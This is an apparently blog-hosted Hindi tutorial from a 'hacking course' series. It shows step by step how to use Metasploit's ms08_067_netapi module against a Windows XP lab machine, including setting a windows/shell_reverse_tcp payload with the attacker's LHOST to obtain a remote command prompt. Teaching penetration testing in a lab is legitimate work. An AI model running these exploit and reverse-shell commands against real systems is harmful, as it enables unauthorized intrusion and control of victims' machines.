Hacking course: Metasploit Framework

हेल्लो दोस्तों ,

काफी दिनों के बाद, हम अपनी इस hacking classes को आगे बढ़ाते हुए आज METASPLOIT FRAMEWORKके बारे में जानेंगे।

Ok, तो सबसे पहले जानते है की आखिर Metasploit Framework क्या है।

Metasploit Framework:-

Metasploit Framework एक Kali Linux का tool है जो किसी भी मशीन की vulnurbilities को use करकेउसे Exploit यानी की Hack करने में मदद करता है।

agar आपने मेरे पिछले tutorials को पढ़ा हो तो आपको याद होगा की जब हमने अपने Windows XP के targetको scan किया था तो हमे एक Vulnerbility MS08-067 मिली थी। हम इसी Vulnerbility को use करकेMetasploit से system को hack करेंगे।

Metasploit को start कैसे करे:-

metasploit को start करने के लिए आपको सबसे पहले

Applications -> Exploitation Tools -> Metasploit Framework

पर Click करना है। उसके बाद Metasploit start हो जाएगा और आपको कुछ ऐसी screen दिखाई देगी

जैसा की आपने इसमें देखा है की अभी इसमें 1467 Exploits, 432 Payloads Installed है। ये Exploits ही हमेUse करने है अपने Target पर। OK अभी हम Metasploit को एक Vulnerability MS08-67 को Exploit करनेके लिए उसे कर रहे है। Metasploit हमे इसके बारे में Details दे सकता है। उसके लिए हमे Metasploit के Inbuilt Feature Search का Use करना होगा

msf > search ms08-67

तो हमने जब ये सर्च किया तो हमे इसका Correct Module नाम पता चला जो की ms08_067_netapi है। अबअगर इसके बाद आप कमांड डाले :=
msf > info exploit/windows/smb/ms08_067_netapi

जैसा की आपने देखा की इस Command के बाद इस Module की सारी Information Show हो गयी है। इसमेंसबसे पहले इसके बारे में इनफार्मेशन दी है। उसके बाद प्लेटफार्म में बताया की ये किसके लिए है जैसा की इसमेंविंडोज है। रैंक बताई गयी है। उसके बाद इसके टार्गेट्स दिखाए गए है। फिर इसमें Basic Options लिस्ट दी गयी है।इसमें आपको कुछ Options दिए है जिसे हमे अपने टारगेट के हिसाब से सेट करना होता है।

RHOST में हमे हमारे टारगेट का IP Address सेट करना होता है। इसमें पूरी डिटेल्स हम बाद में पढ़ेंगे। उसके बादPayload Information है जिसमे कुछ इनफार्मेशन होती है जो Metasploit Exploit के लिए कोन सा Payloadइस्तेमाल करना है बताता है।

Description :- ये किसी Vulnerability की और भी ज्यादा डिटेल्स देता है।

Reference :- इसमें ऑनलाइन Vulnerability Database के लिंक दिए होते है। यहाँ से भी आप किसीVulnerability की डिटेल्स पढ़ सकते है।

OK, अब हमे सही Module पता है, तो अब हमे Metasploit को इस Module को इस्तेमाल करने की कमांड देनीहोगी।
msf > use windows/smb/ms08_067_netap

Setting Module Options

OK, अब हमे Metasploit को कुछ इनफार्मेशन देनी होगी जिससे हम अपने टारगेट की Vulnerability कोExploit कर सके। सबसे पहले हम Metasploit की सेटिंग्स चेक करते है की आखिर उसमे सेट क्या है। उसके लिएहमे कमांड टाइप करनी है:-
msf exploit(ms08_067_netapi) > show options

जैसा की आपको ऊपर Screen-Shot में दिखाया गया है, इसमें 3 Options है।

RHOST :- इसमें हमे अपने टारगेट का IP Address डालना होता है। सबसे पहले हमे इसे सेट करना होगा अपनेटारगेट पर उसके लिए आपको कमांड डालनी है।
set <option to set> <value to set>
set RHOST 192.168.79.160
[image set ]

RPORT :- इसमें हमे PORT डालना होता है Attack के लिए। PORT जैसे की 80, 442, 21 so on। अभी हमअपने Case में इसे Change नहीं करेंगे और  Default 445 ही रहने देंगे।

SMBPIPE :- जैसे की हमने RPORT में Value Change नहीं की थी वैसे ही इसमें भी चेंज नहीं करेंगे औरDefault ही रहने देंगे।

Exploit Target :- Exploit Target 0 Automatic Targetting पे सेट होता है। ये Operating System औरVersion को टारगेट करता है। आप खुद भी इसे सेट कर सकते है और देख सकते है की इसमें कितने टारगेट है।
msf exploit(ms08_067_netapi) > show targets

हमे पता है की हमारा टारगेट Windows XP SP3 है, But ये भी इतना आसान नहीं होता तो इसे भी 0 पर ही रहने दे,ताकि ये अपने आप टारगेट को सेलेक्ट कर सके।
Payloads / Shellcode
जैसा की हमने अभी Show Options कमांड में देखा की हमारा टारगेट भी लिस्ट में है, अब बस हमे अटैक करने कीजरुरत है। लेकिन हमने अभी तक हमने Exploit को ये नहीं बताया की हमारे टारगेट के Exploited होने के बाद वोक्या करे। ये सब करने के लिए Metasploit में पहले से ही Payloads सेट करना काफी आसान हो जाता है हमारेलिए।

Metasploit के Payloads के बारे में हम अगले Tutorials में पढ़ेंगे। Payloads देखने के लिए टाइप करे :
msf exploit(ms08_067_netapi) > show payloads

Check Run:-
OK अभी समझने के लिए हम अभी Default Payload पर ही Exploit करेंगे अपने टारगेट को तो उसके लिए हमेअब बस exploit कमांड डालनी है
msf exploit(ms08_067_netapi) > exploit

आपने देखा की अब यह से Meterpereter जो की Meta-interpreter  की Short Form है स्टार्ट हो गयी है। इससेअब हम अपने टारगेट के साथ कई सारी चीजे कर सकते है, लेकिन ये सब हम बाद में डिटेल में पढ़ेंगे।

Note:- आपने देखा की Metasploit Port 4444 को इस्तेमाल कर रहा है। अभी जो हम अपने टारगेट कोExploit कर रहे है तब तक तो ये सही है, लेकिन जब हम Real World में इसका इस्तेमाल  करेंगे तो हमाराटारगेट Metasploit के Connection को Drop कर देगा क्योकि उसे पता चल जाएगा की ये Metasploitहै।

अभी हम ज्यादा कुछ नहीं करेंगे, इसके बाद अब हम Exit Command enter के इसे Close कर देंगे।

Setting a Payload Manually
Ok, अब हम Manually एक Payload Select करेंगे। Payload Set करने के लिए :-
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

क्योकि ये एक Reverse Shell है तो हमे टारगेट को बताना पड़ेगा की उसे Shell कहा पर Send करने है। उसके लिएहमे अपनी यानि की Kali Linux का IP Address Set करना होगा।

अब हमे LHOST में अपना यानी की Attacker का IP Address डालना है, Kali Linux का IP Address देखने केलिए, Type करे
ipconfig

जैसा की मेरी Kali Linux का IP Address 192.168.79.130 है तो हम ये डालेंगे :-
set LHOST 192.168.79.130

अब फिर से Exploit Command डाल के देखे...

Ohhh... Congratulations, आपने Windows XP को Successfully Exploit कर लिया है। अब आपकी स्क्रीनपर Windows XP का Command Prompt Open हो गया है, इसमें आप कोई भी Windows की Commandडाल  कर उसे Execute कर सकते है :
इसे बंद करने के लिए CTRL + C दबाये  Y दबाकर Enter का बटन दबाए।

तो ये था  Metasploit का पहला और Basic Tutorial आगे इसके और भी Uses आपको बताये जाएंगे। इसे सिखनेके लिए आपको इसे यहाँ पर पढ़कर 2-3 बार Try जरूर करे, आपको इजी लगेगा।

इसमें काफी मेहनत लगी Woofff ... मेरे ब्लॉग का जरूर शेयर करे दोस्तों । हम आगे भी और भी हैकिंग केTutorials  करेंगे।

Happy Hacking...